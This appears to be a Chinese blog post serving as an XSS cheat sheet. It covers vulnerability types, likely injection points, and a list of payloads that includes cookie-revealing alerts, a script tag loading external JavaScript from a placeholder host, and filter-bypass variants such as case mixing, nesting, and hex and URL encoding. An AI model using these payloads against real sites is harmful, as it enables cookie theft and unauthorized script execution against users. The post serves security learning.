XSS漏洞

最新推荐文章于 2024-06-17 16:02:48 发布
最新推荐文章于 2024-06-17 16:02:48 发布
阅读量202 收藏 1
点赞数 6
文章标签: xss 前端 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_76206334/article/details/137689805
版权

1.类型

反射型:大多用于盗取cookie信息

存储型:容易造成蠕虫,cookie盗窃  是高危漏洞

DOM型:不经过后端,是基于文档对象模型(Document Objeet Model,DOM)的一种漏洞,url传入参数去控制触发的,也属于反射型XSS。

2.挖掘的地方

评论区、留言区、注册信息、意见反馈、搜索框、URL参数和URL本身

3.标签用法

<script>

<script>alert("hack")</script>   #弹出hack

<script>alert(/hack/)</script>   #弹出hack

<script>alert(1)</script>        #弹出1,对于数字可以不用引号

<script>alert(document.cookie)</script>      #弹出cookie

<script src=http://xxx.com/xss.js></script>  #引用外部的xss

svg

<svg onload="alert(1)">

<svg onload="alert(1)"//

<img>

<img  src=1  οnerrοr=alert("hack")>

<img  src=1  οnerrοr=alert(document.cookie)>  #弹出cookie

<img  src="javascript:alert('hack');">

<body>

<body οnlοad=alert(1)>

<body οnpageshοw=alert(1)>

<body background="javascript:alert('1')">

video   style  input

<video οnlοadstart=alert(1) src="/http:192.168.xxx.xxx/video/2.mp4" />

<style οnlοad=alert(1)></style>

<input onfocus="alert('1');">

弹窗函数

<script>prompt('1')</script>

script被过滤

<sCRiPt>alert('XSS')</ScRIpT>   #大小写

<scriscriptpt>alert('xss')</scriscriptpt> #双写

<scr<script>ipt>alert('xss')</scr</script>ipt>  #嵌套

<0x736372697074>alert('XSS')</0x736372697074>  #十六进制编码

"><script>alert('XSS')</script> #闭合标签

%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%58%53%53%27%29%3C%2F%73%63%72%69%70%74%3E  #url编码

%3Cscript%3alert(document.cookie);%3C%2Fscript%3 #标签被过滤

<img/src="x"/onerror=alert("xss");>   #空格被过滤

4.xss漏洞利用

可以看这位大佬的文章 http://t.csdnimg.cn/HOdTV

林子汐•
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS漏洞防御
2301_80361487的博客
01-24 433
• 黑名单验证:对包含XSS代码特征的内容进行过滤,如“”、”script”、”#”• 白名单验证:对用户提交的数据进行检查,只接受指定长度范围内、采用适当格式和预期。禁止未授权的脚本执行(新特性,Google Map 移动版在使用)。禁止内联脚本执行(规则较严格,目前发现 GitHub 使用)。禁止外域提交,网站被攻击后,用户的数据不会泄露到外域。4)可以采用白名单验证或者黑名单验证方法。禁止加载外域代码,防止复杂的攻击逻辑。• 对所有输出字符进行HTML编码。字符的输入,其余一律过滤。
XSS漏洞详解
热门推荐
xcxhzjl的博客
11-18 2万+
一、XSS漏洞原理 XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的应用程序或代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码,少数情况下还有ActionScript、VBScript等语言),当信任此Web服务器的用户访问Web站点中含有恶意脚本代码的页面或打开收到的URL链接时,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。 当应用程序没有对用户提交的内容进行验证和重新编码,而是直接呈现给网站的访问者时,就可能会触发XSS攻击。 二、XSS漏洞的危
xss漏洞
nigo134的博客
03-22 560
XSS 漏洞简介 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 常见的输出函数有: echo printf print print_r sprintf die var-dump var_export. XSS分类: 反射型:
XSS漏洞利用
2302_79885863的博客
04-01 2230
输出编码主要有URL、HTML、JS可以采用白名单验证或者黑名单验证方法。白名单验证:对用户提交的数据进行格查,只接受指定长度范围内、采用适当格式和预期字符的输入,其余一律过滤黑名单验证:对包含XSS代码特征的内容进行过滤,如"“、“script”、”#"等·对所有输出字符进行HTML编码‘’ 转成& gt;‘&’ 转成& amp;" 转成& quot;’ 转成& #39;
XSS漏洞检测和利用
2301_80127209的博客
04-25 1136
通过构造一些特殊的xss poc,在可能出现XSS漏洞测试点将这些语句传入网站,我们就能过够相对轻松的探测出XSS漏洞
XSS漏洞学习
最新发布
m0_63017297的博客
06-17 1203
定义:XSS(Cross Site Scripting)攻击全称跨站脚本攻击,是为不和层叠样式表 (Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。成因:XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植 入到提供给其它用户使用的页面中,而程序对输入和输出的控制不够严格,导致“精心构造” 的脚本输入后,再输到前端时被浏览器当作有效代码解析执行从而产生危害。当受害者访问 这些页面时,浏览器会解析并执行这些恶意代码。
XSS 漏洞
Just a Blog
05-01 1647
XSS 漏洞
xss 漏洞
dante_777的博客
07-08 544
xss
渗透测试漏洞XSS漏洞
weixin_50651979的博客
04-07 814
2、存储型XSS,持久性XSSS,存储型XSS是最危险的一种跨站脚本漏洞,当攻击者提交一段代码后,被服务端接收并存储,当攻击者或用户再次访问某个页面时,这段XSS代码被程序读出来响应给浏览器,造成XSS跨站攻击。1、反射型XSS 非持久性XSS(一次性),当用户访问一个带有XSS代码 的HTML请求时,服务端接收后处理,然后把带有XSS的数据发送到浏览器,浏览器解析这段带有XSS代码的数据后,造成XSS漏洞。:存储型XSS漏洞,由于其持久化特性,容易造成蠕虫病毒的传播,进一步扩大攻击范围。
JSP使用过滤器防止Xss漏洞
10-17
在Web开发中,XSS(Cross-site scripting)漏洞是一种常见的安全威胁,允许攻击者通过注入恶意脚本到网页中,从而影响用户浏览器的行为。JSP(JavaServer Pages)作为常用的服务器端动态网页技术,同样需要关注XSS...
DedeCMS 存储型xss漏洞1
08-03
【DedeCMS 存储型 XSS 漏洞1】详解 DedeCMS 是一款广泛使用的基于PHP的开源网站管理系统,其特色在于提供了一个简洁易用的后台管理界面,帮助企业或个人快速构建网站。然而,如同任何软件一样,DedeCMS 也存在安全...
百度编辑器解决xss漏洞
03-01
百度编辑器解决xss漏洞
JSP安全开发之XSS漏洞详解
10-21
7. **代码审查**:定期进行代码审查,检查可能的XSS漏洞,并确保所有用户输入都经过了适当的安全处理。 8. **安全编码最佳实践**:遵循安全编码原则,例如,避免在HTML中动态生成JavaScript,而是将其放在外部文件...
SQL+XSS漏洞修复方案
04-13
总之,SQL注入和XSS漏洞的修复需要开发者具备良好的安全意识,并在编程时遵循最佳实践。通过使用预编译语句、输入验证和内容转义,我们可以大大降低这些风险,保护用户的个人信息和系统的完整性。在实际项目中,定期...
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
xss漏洞jar.rar
09-29
跨站脚本(Cross site script,简称xss)是一种“HTML注入”,由于攻击的脚本多数时候是跨域的,所以称之为“跨域脚本”。 我们常常听到“注入”...可以通过导入以下两个jar,通过配置实现xss漏洞修复,无需修改代码
XSS漏洞利用深度解析
这篇资料主要探讨了XSS漏洞的利用和挖掘,适合初学者入门学习。 首先,攻击者可能将XSS攻击代码嵌入到网页中,当用户访问这个被注入的页面时,恶意脚本会在用户的浏览器上下文中执行。例如,`alert(1)`或`alert...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值